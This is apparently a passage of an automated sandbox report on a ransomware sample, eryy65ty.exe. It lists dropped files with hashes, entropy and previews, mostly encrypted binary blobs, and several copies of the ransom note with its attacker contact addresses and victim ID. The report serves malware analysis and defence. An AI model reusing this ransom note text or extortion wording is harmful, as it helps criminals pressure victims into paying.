                                                                                                                                              Preview:U&.Y..m...K..+..,...f6.W...A..It>.K...5%Qv....O..;..T..K.d.)..oGT.Lm..KM.X.........k.h.c..&b.0V.....#.w.......?M..?.LEt.E.!.m...\.^....$...e.?..V....~.e..8.'.}.....2..2....C2.....l.$.}.=]~.~}........Z.T..~f v.......+..)..N:...b..0S.....fD.P.8.)xuM.&.A.9..VB.:9..asss..^3....}G.Vc.....E.\k7...d.z\.h.c..B.`.A...{.x.....f..3?.7.}H..JNNK....cY.......e.t.."..>...}.(R.R..7.........B.l>..6.F...7#.>tO......J..i8.h..P.K...]}*B^..d.P.j2d.qd..c.LY...........=..t...)_c,".<5a...D..|......O..E...Q.ec.Yj........]`..'b......P.....%......>..3..D..;2.}%#...w.:H..Yq..H.Q|I\...;..!g.]...gZ.+.S^.#.W..;:.`......[..M..G2tq..l..`_....4s ....!X.K...f.>!^M&...*. x.v.. P.8...P...g.............&i..c..KjS...5>.w...&......yER.?..?....q.X..fi._.x..-..;.u].[.d.5Aff......B.K>..K.0......r..h>.192....(p.[U...!...!..M0.4.[......=......u?EL.`+..x.?.+...!h...].>....Y.h. .P..{.....y.|...D.h.......K.......1i.-.*El.....nT#.'z.,.F*.....x ....\....<9H.....xW.......\-.Q.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.840910609667376
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:KThcolhFIbJdbWQ3AuKP2n+A8oFPou6ntXiES1diGg02:KThcKQb2QYP23Q1gf4GQ
                                                                                                                                              MD5:40533E97329CF865F4650FFC247A9491
                                                                                                                                              SHA1:C4ADE112CD4614C3B0A347576FD89840319CAD24
                                                                                                                                              SHA-256:7689D48ED7BC9991E4884A994B4D1B8AF6309A24CF4FF43997A3113B2E46AB45
                                                                                                                                              SHA-512:02683DAB86D6FA18D41DB3FEF2A8123FA069288EBF53DB1C9B96A482B77479D23A04BF0D8B39291911E7EA02E6626972CBC0EE368168C7DBC14153C495F70292
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:U&.Y..m...K..+..,...f6.W...A..It>.K...5%Qv....O..;..T..K.d.)..oGT.Lm..KM.X.........k.h.c..&b.0V.....#.w.......?M..?.LEt.E.!.m...\.^....$...e.?..V....~.e..8.'.}.....2..2....C2.....l.$.}.=]~.~}........Z.T..~f v.......+..)..N:...b..0S.....fD.P.8.)xuM.&.A.9..VB.:9..asss..^3....}G.Vc.....E.\k7...d.z\.h.c..B.`.A...{.x.....f..3?.7.}H..JNNK....cY.......e.t.."..>...}.(R.R..7.........B.l>..6.F...7#.>tO......J..i8.h..P.K...]}*B^..d.P.j2d.qd..c.LY...........=..t...)_c,".<5a...D..|......O..E...Q.ec.Yj........]`..'b......P.....%......>..3..D..;2.}%#...w.:H..Yq..H.Q|I\...;..!g.]...gZ.+.S^.#.W..;:.`......[..M..G2tq..l..`_....4s ....!X.K...f.>!^M&...*. x.v.. P.8...P...g.............&i..c..KjS...5>.w...&......yER.?..?....q.X..fi._.x..-..;.u].[.d.5Aff......B.K>..K.0......r..h>.192....(p.[U...!...!..M0.4.[......=......u?EL.`+..x.?.+...!h...].>....Y.h. .P..{.....y.|...D.h.......K.......1i.-.*El.....nT#.'z.,.F*.....x ....\....<9H.....xW.......\-.Q.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.862611037001082
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:z5ltnxP+o70+68/JHheA+1sU5A6XwAN15ClkDB3e57HuhJ/IV7RznU8UagTQXn:H6o70+68JHhh+1soA6HNfClk80hJY1Ug
                                                                                                                                              MD5:4373E14BD21400524D095D307F76BC6E
                                                                                                                                              SHA1:9A723753872FEB6EDAC525E64A5D91C079E141F1
                                                                                                                                              SHA-256:CEFF9B9B2453E1CBE8F39423DEAF81CC3654B5E9A8E2722BB40960CA49B19B98
                                                                                                                                              SHA-512:57CAA04E9A2174F7EFDBE245FAC1FC5A706D32B6CE6D5BD3080538F430B32543AB18B727C45827ACCBF0EE7E5D4FB5987A73DFA45A6CBE71D0F6FC46D8BA51A5
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:0.zw.*.P...9.zm....fTaKH.m....#b.'...>.<.. ..O..%gw,.j:.,...-.v,..._Q,.....!....".a+E7u6:......{._~|h.vQ.!"ur.H..J.....E.'g7.?B....f...C........G.]a..TEr.../...r.Pn.R._7K....7.xU..he...Ij...|.:..7....k..3u..`..Fe..7.&x...`m....Lm...O...[.WX..p.[..4gs..j..X.... ......1....;/%FQ...|....M.EzP"...i.8.|...s^q..j.....31..mM...2....>...q..(.F.x.c;.....`..._T.<0...v............$.`.....<..p.g..W....S..nD^.mSJ].Z~1dpN..<..N........un..55.."....x>.&.).u+6..5].$.[O&.5........u......sX....eia....fw.....F ..zm.\T..........9(..F.C.D.H...7.10.*.4e...d....1...w<eZ....K`....(.k.1.1.....T..3..y...$.a..uR.C..t,.E=.2.+....b..*..EU......;.......0.EO..#.a..|....^..c./..`.H..!B.i=...._dL|Gg.....k.......7$.....1;^j........J$A..v......*;(.+.n...|.`..d.......jj..W.oH.;.J.x.vp .+.....Zj.n...4m..$.V....(.v.7....&.(..r.Z.P....V.k..p;Z.1|....Y...k..._z../0+....#[.;Roj..Zl..b..G!...Q.b..Y.G...K*..s.T.cu_.?D...'1@S.).s/...G..oMe.j?yt....3.4..(^5.K..'.di.../O.`.,.C..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.862611037001082
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:z5ltnxP+o70+68/JHheA+1sU5A6XwAN15ClkDB3e57HuhJ/IV7RznU8UagTQXn:H6o70+68JHhh+1soA6HNfClk80hJY1Ug
                                                                                                                                              MD5:4373E14BD21400524D095D307F76BC6E
                                                                                                                                              SHA1:9A723753872FEB6EDAC525E64A5D91C079E141F1
                                                                                                                                              SHA-256:CEFF9B9B2453E1CBE8F39423DEAF81CC3654B5E9A8E2722BB40960CA49B19B98
                                                                                                                                              SHA-512:57CAA04E9A2174F7EFDBE245FAC1FC5A706D32B6CE6D5BD3080538F430B32543AB18B727C45827ACCBF0EE7E5D4FB5987A73DFA45A6CBE71D0F6FC46D8BA51A5
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:0.zw.*.P...9.zm....fTaKH.m....#b.'...>.<.. ..O..%gw,.j:.,...-.v,..._Q,.....!....".a+E7u6:......{._~|h.vQ.!"ur.H..J.....E.'g7.?B....f...C........G.]a..TEr.../...r.Pn.R._7K....7.xU..he...Ij...|.:..7....k..3u..`..Fe..7.&x...`m....Lm...O...[.WX..p.[..4gs..j..X.... ......1....;/%FQ...|....M.EzP"...i.8.|...s^q..j.....31..mM...2....>...q..(.F.x.c;.....`..._T.<0...v............$.`.....<..p.g..W....S..nD^.mSJ].Z~1dpN..<..N........un..55.."....x>.&.).u+6..5].$.[O&.5........u......sX....eia....fw.....F ..zm.\T..........9(..F.C.D.H...7.10.*.4e...d....1...w<eZ....K`....(.k.1.1.....T..3..y...$.a..uR.C..t,.E=.2.+....b..*..EU......;.......0.EO..#.a..|....^..c./..`.H..!B.i=...._dL|Gg.....k.......7$.....1;^j........J$A..v......*;(.+.n...|.`..d.......jj..W.oH.;.J.x.vp .+.....Zj.n...4m..$.V....(.v.7....&.(..r.Z.P....V.k..p;Z.1|....Y...k..._z../0+....#[.;Roj..Zl..b..G!...Q.b..Y.G...K*..s.T.cu_.?D...'1@S.).s/...G..oMe.j?yt....3.4..(^5.K..'.di.../O.`.,.C..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.855411954679044
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1E096fdFMSVJrDHZvS5bV5mR+LEGMaJ0xI4XIBmqR13OMvJCN0ureZg09RhUhnii:1Ece5S1m6x0xxYBJPvk0ureG09Cyg
                                                                                                                                              MD5:B50FE6686415FEEB83533E4AE80069B6
                                                                                                                                              SHA1:0DEA21AFD9AB8A8FB05FAD0698C589752707A71F
                                                                                                                                              SHA-256:F0DDDDEF6073AD306C12AC7D71949F36751BE9F17C99A5BD6DF3BA7D8C1C1A82
                                                                                                                                              SHA-512:D7C59A04D567A10051E28847C423CFEFDDCE6DEC2641B1F02930C0FC71A2FC0FD6C4CE7502592A6BB104CD03A96F1AA140112FAF1DD86C147F18D5CC32DA271A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:e.%I.......ru.^..n`VT.e...u...SV....o.......7).x*.....Z._..'?.......Y,..N..M.....P..)..qD...Cp9..>......#JJu.....o..i1%.K..Y._..E..!...[......E.......O....`.....H|...m......wj....v!......g..2..O..o[.........].`../.J....L...l......k..tH6.dF9.&mO...:.Y+.S9o).=W.c.|..AU$.....b...k^.....A..]....."..(...R6o.[J...e%..>...1SO;/..j.YQ..SU.".@. ..p.kr.X.9q....kZ.P.,.w.cf.....2...W...:;...%..x4..V..g.f.:.."[Nr.y.fv_Lw.*.S0-..p....,..BC.......].p".}../.w..>..l...v..#\j&.X.,"..f:...]|Z....[..".q.....d.==c#t.;.?....i..gnD.b......8, ....-.8a.Z.P.x..*...l.....q...F...[6].t...2r$-l5u..zGm......Y.h...;;......X.]....L>c........U..bzQ.."...ni......t.....f.e]z..+. ]..5%p.TM.5...-.1...A..w..wg.....L....!"o3...Dy'J2...R^pR..P7.\|..tq....=X.e.......N..M.+n...gk1./w......\..9=;M.u...@M...x8L.p#....%....e...H.t...v!.h@..7.\.@.....O.n..:........Bi.9.A.....uw6...;..sC...~..?{(....U........"....}g_..=.d..NhN...3....5.\..&8.H@.".......j...'.;.T........7.cg...1I.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.855411954679044
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:1E096fdFMSVJrDHZvS5bV5mR+LEGMaJ0xI4XIBmqR13OMvJCN0ureZg09RhUhnii:1Ece5S1m6x0xxYBJPvk0ureG09Cyg
                                                                                                                                              MD5:B50FE6686415FEEB83533E4AE80069B6
                                                                                                                                              SHA1:0DEA21AFD9AB8A8FB05FAD0698C589752707A71F
                                                                                                                                              SHA-256:F0DDDDEF6073AD306C12AC7D71949F36751BE9F17C99A5BD6DF3BA7D8C1C1A82
                                                                                                                                              SHA-512:D7C59A04D567A10051E28847C423CFEFDDCE6DEC2641B1F02930C0FC71A2FC0FD6C4CE7502592A6BB104CD03A96F1AA140112FAF1DD86C147F18D5CC32DA271A
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:e.%I.......ru.^..n`VT.e...u...SV....o.......7).x*.....Z._..'?.......Y,..N..M.....P..)..qD...Cp9..>......#JJu.....o..i1%.K..Y._..E..!...[......E.......O....`.....H|...m......wj....v!......g..2..O..o[.........].`../.J....L...l......k..tH6.dF9.&mO...:.Y+.S9o).=W.c.|..AU$.....b...k^.....A..]....."..(...R6o.[J...e%..>...1SO;/..j.YQ..SU.".@. ..p.kr.X.9q....kZ.P.,.w.cf.....2...W...:;...%..x4..V..g.f.:.."[Nr.y.fv_Lw.*.S0-..p....,..BC.......].p".}../.w..>..l...v..#\j&.X.,"..f:...]|Z....[..".q.....d.==c#t.;.?....i..gnD.b......8, ....-.8a.Z.P.x..*...l.....q...F...[6].t...2r$-l5u..zGm......Y.h...;;......X.]....L>c........U..bzQ.."...ni......t.....f.e]z..+. ]..5%p.TM.5...-.1...A..w..wg.....L....!"o3...Dy'J2...R^pR..P7.\|..tq....=X.e.......N..M.+n...gk1./w......\..9=;M.u...@M...x8L.p#....%....e...H.t...v!.h@..7.\.@.....O.n..:........Bi.9.A.....uw6...;..sC...~..?{(....U........"....}g_..=.d..NhN...3....5.\..&8.H@.".......j...'.;.T........7.cg...1I.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.84631392923649
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Z18i0aqbOJpxLpJix0T7PJn8gza8mJg+iYc4t+3NN27m7x0OxjMYTqjH:UhvcKxiJ4Vfc4toNBa6jMTr
                                                                                                                                              MD5:EF1D2EC9F43CAC256121582C8095476F
                                                                                                                                              SHA1:5881424F2AE2013DC890C5A2AF621263A80FFAA7
                                                                                                                                              SHA-256:6BCBE7870E122FE7197DDE84E4EE83757C0CC313D060254CB052C7DB09347ABC
                                                                                                                                              SHA-512:BBDB66A71DB6C94A4AED425165B30A3AC38EA6836BA11A08081A55BC3D0C6C9EE1CD449E7AF41817ED13A2998CF352A1432998720F76751D4605BA11EDD4C0FC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..v.P F..>>.i.@.A...m.(.^......jW...k..o...k.LMK/ ..^\...q......G..,.......>9...a..+.8U.3.J"$..o.[.0./=.\.E.cU..uQ.5T.{,X..sU.K..KP......A..2.v...!@.{...n....5VqLp....T.D.Y....S....6.<4*.H.@.[..K.hNA.e>...l........V.gi....-.........q.0..?.......H'...+hr.....i.s.j...l.M...RN.......b.Q..vr.#...E.vc.qd3}...]A.m....B.,.).b!...)h]rW.cE....j...W..<...n6A.YD.-....Z...0.ey..@.Y...$A1p.L/.`6.#.@W.T2J-........^?...g..D.[..".sQ9. uv...#d..J`.-M.(.....byZ*5.2}.4.%.J.db..f..F9.6...O^p.k.... ..%.'........7Dc.m....m+V.Q...q.1.R.n..s.<.......ka.*L.(i...=.....:.]Xyj_ ..W...K......8h..|...M[....H.G.g.4.....1@.M..N.....Z.G].b..n.L,J.^.j..z/.....B@8j.R..n.J..J...$..q..z.`..&..l.]....z._?....g....V].E.....TC.v.O.l....T..)N...f.x...........;..DY.}.......15.....V...(_.m...P..z.S.PQ..B...%...V......\d.%.... ...g+.H.@\.}nv...[...........]..1.m..6..<VP.~...cT.N.~0..V..>D.>USo`.l]..X9.`..p).q&3k..#0=@[../+.F ....bP..../j...".S.ZW....,.....)Z.....Y..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.84631392923649
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:Z18i0aqbOJpxLpJix0T7PJn8gza8mJg+iYc4t+3NN27m7x0OxjMYTqjH:UhvcKxiJ4Vfc4toNBa6jMTr
                                                                                                                                              MD5:EF1D2EC9F43CAC256121582C8095476F
                                                                                                                                              SHA1:5881424F2AE2013DC890C5A2AF621263A80FFAA7
                                                                                                                                              SHA-256:6BCBE7870E122FE7197DDE84E4EE83757C0CC313D060254CB052C7DB09347ABC
                                                                                                                                              SHA-512:BBDB66A71DB6C94A4AED425165B30A3AC38EA6836BA11A08081A55BC3D0C6C9EE1CD449E7AF41817ED13A2998CF352A1432998720F76751D4605BA11EDD4C0FC
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..v.P F..>>.i.@.A...m.(.^......jW...k..o...k.LMK/ ..^\...q......G..,.......>9...a..+.8U.3.J"$..o.[.0./=.\.E.cU..uQ.5T.{,X..sU.K..KP......A..2.v...!@.{...n....5VqLp....T.D.Y....S....6.<4*.H.@.[..K.hNA.e>...l........V.gi....-.........q.0..?.......H'...+hr.....i.s.j...l.M...RN.......b.Q..vr.#...E.vc.qd3}...]A.m....B.,.).b!...)h]rW.cE....j...W..<...n6A.YD.-....Z...0.ey..@.Y...$A1p.L/.`6.#.@W.T2J-........^?...g..D.[..".sQ9. uv...#d..J`.-M.(.....byZ*5.2}.4.%.J.db..f..F9.6...O^p.k.... ..%.'........7Dc.m....m+V.Q...q.1.R.n..s.<.......ka.*L.(i...=.....:.]Xyj_ ..W...K......8h..|...M[....H.G.g.4.....1@.M..N.....Z.G].b..n.L,J.^.j..z/.....B@8j.R..n.J..J...$..q..z.`..&..l.]....z._?....g....V].E.....TC.v.O.l....T..)N...f.x...........;..DY.}.......15.....V...(_.m...P..z.S.PQ..B...%...V......\d.%.... ...g+.H.@\.}nv...[...........]..1.m..6..<VP.~...cT.N.~0..V..>D.>USo`.l]..X9.`..p).q&3k..#0=@[../+.F ....bP..../j...".S.ZW....,.....)Z.....Y..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8523150484369175
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ZISCRuCXs4R94e+PRq5YdPRcBtZ+mcN0wF3AsTQYVsy9dw1US:mRL3Bj5YRIUrN0g3As92US
                                                                                                                                              MD5:2990D8593CB0F9688741E86D3B3B8B87
                                                                                                                                              SHA1:1D7FCDD0B8BC7EA735EC6F2C00FF4103CC056C37
                                                                                                                                              SHA-256:480EAE2D30BB407F19CB827113310757FE3EF5E40A3193AE0120DA0695B1623D
                                                                                                                                              SHA-512:F750BD937876E112696CFB9BDC66DF4E28420EFC895BBA9E760DB60C1DA2A99FC51396332FF1F9BA600FE1EC01D6A2F20A550EA0EEAC0D6FCE23530ECF27B401
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:(.3....yy.+........^......WS...&{(}z.c.x.U. .......p.........)...M..R.w...Fn,.d.G>3..9.%.E5....?.{.....n3t....WW..@..>o...ro.5...z..>-%.._..E.p.......A@..2..W{.k..&..2v/.....F2....H..[.j%.9.7.9m.'...f.R..~=..nO))K.c..a......Xp......-.C.L.z.+lQ(-.E..P'*.8..8X.....7n.e:.g.6..\.n..UT.x.....".b..S.h.../q...$=/G..<6.Y._. &......$.\.k.~m.U.-..[....M...I.......;.JPE.B..#0n.1.R.w....[T&!.K2..._H7..hH}>F..a..T.1.+...7...W.,...{...gf.S...e.>A.....*}`....dw....2>Q...A1..J.|K.g.q...@..w~......$S.....x.)(..1!~x."..&...;.`d ..-..#..b.i..l....F.(W..W ...s.$.k..t..&..CZ......01..J..o......h.......\W.8^.. S..)u...z+.f.~....W...A.mW... c"e1.#}a.:M........K.FI.."..I....M.;...gsm..(.$......E^N"....9~.......A.sW..j.%..<d....]?.....r. o.X!.Z.X..W.78..M....1.4.#..L...........'Mu,....Ub.....$~..E.$.O.O..YC..%...J....A.... .1."Ck..e....>..X..a.d.80....vu8B.....<.y.....>..GI...\..........j"..{......]..S....]..Xr.x..h...i.&w.u.1..'^^R.+J...$R......C.%2..$.|Vm.q.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.8523150484369175
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:ZISCRuCXs4R94e+PRq5YdPRcBtZ+mcN0wF3AsTQYVsy9dw1US:mRL3Bj5YRIUrN0g3As92US
                                                                                                                                              MD5:2990D8593CB0F9688741E86D3B3B8B87
                                                                                                                                              SHA1:1D7FCDD0B8BC7EA735EC6F2C00FF4103CC056C37
                                                                                                                                              SHA-256:480EAE2D30BB407F19CB827113310757FE3EF5E40A3193AE0120DA0695B1623D
                                                                                                                                              SHA-512:F750BD937876E112696CFB9BDC66DF4E28420EFC895BBA9E760DB60C1DA2A99FC51396332FF1F9BA600FE1EC01D6A2F20A550EA0EEAC0D6FCE23530ECF27B401
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:(.3....yy.+........^......WS...&{(}z.c.x.U. .......p.........)...M..R.w...Fn,.d.G>3..9.%.E5....?.{.....n3t....WW..@..>o...ro.5...z..>-%.._..E.p.......A@..2..W{.k..&..2v/.....F2....H..[.j%.9.7.9m.'...f.R..~=..nO))K.c..a......Xp......-.C.L.z.+lQ(-.E..P'*.8..8X.....7n.e:.g.6..\.n..UT.x.....".b..S.h.../q...$=/G..<6.Y._. &......$.\.k.~m.U.-..[....M...I.......;.JPE.B..#0n.1.R.w....[T&!.K2..._H7..hH}>F..a..T.1.+...7...W.,...{...gf.S...e.>A.....*}`....dw....2>Q...A1..J.|K.g.q...@..w~......$S.....x.)(..1!~x."..&...;.`d ..-..#..b.i..l....F.(W..W ...s.$.k..t..&..CZ......01..J..o......h.......\W.8^.. S..)u...z+.f.~....W...A.mW... c"e1.#}a.:M........K.FI.."..I....M.;...gsm..(.$......E^N"....9~.......A.sW..j.%..<d....]?.....r. o.X!.Z.X..W.78..M....1.4.#..L...........'Mu,....Ub.....$~..E.$.O.O..YC..%...J....A.... .1."Ck..e....>..X..a.d.80....vu8B.....<.y.....>..GI...\..........j"..{......]..S....]..Xr.x..h...i.&w.u.1..'^^R.+J...$R......C.%2..$.|Vm.q.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.860957389824335
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:xX1nfS8Z1JjvGV+PzQGacS5wgNO8jAbde8Iiqg4uIl+ow8tJAZZnpuJ3N4m/2:Xa8ZqpjpA8kbdrIiqg4RL3tJeZnpulF2
                                                                                                                                              MD5:68BB8E259F32186DEE21FC8C06850F86
                                                                                                                                              SHA1:44700076FF5760779948C26DCC93580341E9B617
                                                                                                                                              SHA-256:D8AEF07FC4BEA22148081593D122F8F19AC86F6F6FD10251082B722BC996973C
                                                                                                                                              SHA-512:94A2DB2D024F38872BCF7C5A6152532F895E0B25E28506CB366B7B90FF3ABD81F7930601A491A17C3CC1FDE3445730435F1355754A259CAA395FAAB7E88FD8F0
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..S...T..t.W..J0yE...c...d....P-..fs..Ly....._.l.*[.....D.GG.wb...Y...2.....|Z).>.)...H.((z(.\\.V^Z.D...a.....ZpLx.7c.?.:...SO.7.\..oe...]....X....%T....k.ROsP.X.f_...q..&...<.q.Q.y]a.T.bn(X.6G...:.....5Y@...8..%..V.W#.0x...V.H.]....B.(.I..Z.U...X.`x.:_..|...s..83|.|..rF|:).;.z...P..=..fM........h...GJ~..[0.]f.M..&.%........:C....I.r]Q.=..L1.Vh..].....UV..j]D.(.Whd.h..a.y...V.W..Oo=..@.....v....A_.Uh.%. ....i.f8...A..:ph.SEL.v..gd2....W....N#.i..q..n.tc..$7.....dJ.o.\x.}.....j.F.Q.&...L .37"......]F..3..BW0J..|..s.+../H~./.5.sN...9.S...h*..z....*#.G..7.....V.N.2.y...p.""./..5u.....d;.F..~D.H.v..jN~W..Q..r..w.!#...SU..V9,.R.S.s;.WG..^M..Q../..M..).....QZ.\...&$....5!4`.':..bcHTM.O...p...G`.j.rr.\.....f.O.5......Bz.9T..x..0.L}m.*...QV...XU...D'.....JQ(.t.(7<.qK?..u.k...`..M1=....1..Ev..9../.Fi....r..^.`%.g.1*(c..B.....)l\.W...U@.p...P...7.q..A+..l.,....o....J.|j..=...y.>^?..?..L.&....WAL..s..m....m2..l..4+..Q.4G6n.f.q...mm=..Q..>._(6k...%.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1292
                                                                                                                                              Entropy (8bit):7.860957389824335
                                                                                                                                              Encrypted:false
